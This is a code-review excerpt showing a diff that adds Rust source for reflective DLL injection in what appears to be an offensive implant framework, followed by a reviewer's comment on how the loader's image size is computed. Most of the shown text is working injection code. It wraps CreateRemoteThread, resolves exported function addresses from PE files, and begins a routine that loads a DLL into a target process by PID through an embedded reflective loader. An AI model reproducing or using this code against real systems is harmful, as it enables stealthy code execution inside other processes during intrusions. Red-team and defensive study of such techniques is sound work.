implants/lib/eldritch/src/sys/dll_reflect_impl.rs

```diff
@@ -0,0 +1,422 @@
+    let tmp_lpstartaddress: Option<unsafe extern "system" fn(_) -> _> = match lpstartaddress {
+        Some(local_lpstartaddress) => Some(unsafe { std::mem::transmute(local_lpstartaddress) }),
+        None => todo!(),
+    };
+    let res = unsafe{CreateRemoteThread(hprocess, lpthreadattributes, dwstacksize, tmp_lpstartaddress, lpparameter, dwcreationflags, lpthreadid)};
+    if res == 0 {
+        let error_code = unsafe { GetLastError() };
+        if error_code != 0 {
+            return Err(anyhow::anyhow!("Failed to create remote thread. Last error returned: {}", error_code))
+        }
+    }
+    Ok(res)
+}
+#[cfg(target_os = "windows")]
+fn get_export_address_by_name(pe_bytes: &[u8], export_name: &str, in_memory: bool) -> anyhow::Result<usize> {
+    let pe_file = object::read::pe::PeFile64::parse(pe_bytes)?;
+
+    let section = match pe_file.section_by_name(".text") {
+        Some(local_section) => local_section,
+        None => return Err(anyhow::anyhow!(".text section not found")),
+    };
+
+    let mut section_raw_data_ptr = 0x0;
+    for section in pe_file.section_table().iter() {
+        let section_name = String::from_utf8(section.name.to_vec())?;
+        if section_name.contains(".text") {
+            section_raw_data_ptr = section.pointer_to_raw_data.get(LE);
+            break;
+        }
+    }
+    if section_raw_data_ptr == 0x0 {
+        return Err(anyhow::anyhow!("Failed to find pointer to text section."))
+    }
+
+    // Section offset for .text.
+    let rva_offset = section.address() as usize - section_raw_data_ptr as usize - pe_file.relative_address_base() as usize;
+
+    let exported_functions = pe_file.exports()?;
+    for export in exported_functions {
+        if export_name == String::from_utf8(export.name().to_vec())?.as_str() {
+            if in_memory {
+                return Ok(export.address() as usize - pe_file.relative_address_base() as usize);
+            } else {
+                return Ok(export.address() as usize - rva_offset - pe_file.relative_address_base() as usize);
+            }
+        }
+    }
+
+    Err(anyhow::anyhow!("Function {} not found", export_name))
+}
+
+#[cfg(target_os = "windows")]
+struct UserData {
+    function_offset: u64,
+}
+
+#[cfg(target_os = "windows")]
+fn handle_dll_reflect(target_dll_bytes: Vec<u8>, pid:u32, function_name: &str) -> anyhow::Result<()>{
+    let loader_function_name = "reflective_loader";
+    let reflective_loader_dll = LOADER_BYTES;
+
+    let target_function = get_export_address_by_name(
+        &target_dll_bytes,
+        function_name,
+        true)?;
+    let user_data = UserData{function_offset: target_function as u64};
+
+    let dos_header = reflective_loader_dll.as_ptr() as *mut IMAGE_DOS_HEADER;
+    let nt_header = (reflective_loader_dll.as_ptr() as usize + (unsafe { *dos_header }).e_lfanew as usize) as *mut IMAGE_NT_HEADERS64;
+    let image_size = (unsafe { *nt_header }).OptionalHeader.SizeOfImage;
```

Comment:
Since image_size is the reflective loaders image size we probably don't need the in memory size we should probably just use the on disk size which can be determined by the bytes length.